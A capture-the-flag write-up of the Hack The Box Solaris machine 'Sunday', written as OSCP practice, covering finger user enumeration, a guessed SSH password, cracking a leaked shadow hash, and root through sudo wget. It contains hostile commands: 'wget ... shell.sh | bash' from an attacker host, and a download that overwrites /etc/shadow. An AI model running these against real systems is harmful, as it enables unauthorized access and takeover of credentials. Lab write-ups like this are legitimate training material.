TJ_Null’s OSCP Prep – HTB – Sunday
On this Solaris machine we used finger to enumerate users. We then guessed the password for the enumerated user to get SSH access. From there we escalated our privilege to Sammy through a shadow file we had access to. I cracked the password and as able to SU to Sammy. Sammy was able to run wget as sudo. To get root priv we overwrite the shadow file and run sudo su to get root shell.
Table Of Contents
Enumeration
NMAP
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sunday]
ββ# cat nmap.ver
# Nmap 7.92 scan initiated Wed Feb 9 07:18:14 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.ver 10.10.10.76
Warning: 10.10.10.76 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.76
Host is up (0.080s latency).
Not shown: 63008 filtered tcp ports (no-response), 2522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
79/tcp open finger?
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer?
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| tls-alpn:
|_ http/1.1
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
Sub-directory brute-force – Feroxbuster
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sunday]
ββ# feroxbuster --url https://10.10.10.76:6787/solaris --filter-status 401,402,403,404 --depth 2 -k --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.5.0
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β https://10.10.10.76:6787/solaris
π Threads β 50
π Wordlist β /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
π’ Status Code Filters β [401, 402, 403, 404]
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.5.0
π Config File β /etc/feroxbuster/ferox-config.toml
π HTTP methods β [GET]
π Insecure β true
π Recursion Depth β 2
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Management Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
302 GET 7l 18w 223c https://10.10.10.76:6787/solaris/login => https://10.10.10.76:6787/solaris/login/
Looking at the website.
Finger on port 79
We can enumerate users using Finger, and using a large username database we found a couple of users. Sunny and Sammy to list a few.
βββ(rootπkali)-[/home/β¦/Desktop/HTB/sunday/finger-user-enum-1.0]
ββ# perl finger-user-enum.pl -U xato-net-10-million-usernames.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... xato-net-10-million-usernames.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Wed Feb 9 08:10:48 2022 #########
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..dhcpserv DHCP Configuration A < . . . . >..ikeuser IKE Admin < . . . . >..lp Line Printer Admin < . . . . >..
root@10.10.10.76: root Super-User console <Dec 19 10:30>..
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
sammy@10.10.10.76: sammy ??? console <Dec 19 08:35>..
7777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
sunny@10.10.10.76: sunny ??? console <Dec 19 09:56>..
bin@10.10.10.76: bin ??? < . . . . >..
7777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
network@10.10.10.76: Login Name TTY Idle When Where..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..
nobody@10.10.10.76: nobody NFS Anonymous Access < . . . . >..
77777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
77777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
Admin@10.10.10.76: Admin < . . . . >..
films+pic+galeries@10.10.10.76: Login Name TTY Idle When Where..films+pic+galeries ???..
printer@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
7654321@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
daemon@10.10.10.76: daemon ??? < . . . . >..
789987@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
7085506@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..Shell as Sunny
To get a shell as Sunny we had to guess the password. Since we have a couple of usernames and the name of the machine for instance. The combination sunny/sunday worked.
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sunday]
ββ# ssh -p 22022 sunny@10.10.10.76
Password:
Last login: Thu May 3 15:25:35 2018 from 10.10.14.12
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)Privilege escalation: Shell as Sammy
In Sunny’s folder there was a shadow.backup file which contained the hash for the user Sammy. I extracted the hash and used unshadow and john the ripper to crack the hash. The credential for Sammy is Sammy:cooldude!
sunny@sunday:/backup$ ls -la
total 28
drwxr-xr-x 2 root root 4 Dec 19 09:43 .
drwxr-xr-x 25 root sys 28 Feb 9 13:34 ..
-rw-r--r-- 1 root root 319 Dec 19 09:43 agent22.backup
-rw-r--r-- 1 root root 319 Dec 19 09:43 shadow.backup
sunny@sunday:/backup$ cat agent22.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sunday]
ββ# unshadow passwd shadow > unshadow.txt
βββ(rootπkali)-[/home/aghanim/Desktop/HTB/sunday]
ββ# john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt 1 β¨―
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0.46% (ETA: 09:22:34) 0g/s 6548p/s 6548c/s 6548C/s jasmine99..Bryan
cooldude! (sammy)
1g 0:00:00:32 DONE (2022-02-09 08:40) 0.03123g/s 6364p/s 6364c/s 6364C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Root
wget
Sammy could run wget as sudo.
-bash-4.4$ sudo -l
User sammy may run the following commands on sunday:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wgetTried getting a shell using this method but didnt work.
-bash-4.4$ sudo /usr/bin/wget http://10.10.14.18:9000/shell.sh | bash
--2022-02-09 13:47:36-- http://10.10.14.18:9000/shell.sh
Connecting to 10.10.14.18:9000... connected.
HTTP request sent, awaiting response... 200 OKShell as Root
Since we have the shadow.backup file we could just add the hash of Sammy to root and overwrite the real shadow file.
sammy@sunday:~$ sudo wget -O /etc/shadow http://10.10.14.5/shadow
--02:00:10-- http://10.10.14.5/shadow
=> `/etc/shadow'
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 392 [application/octet-stream]
100%[==========================================================================================================================================================================================================>] 392 --.--K/s
02:00:10 (42.45 MB/s) - `/etc/shadow' saved [392/392]
sammy@sunday:~$ su -
Password:
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
You have new mail.
root@sunday:~# id
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
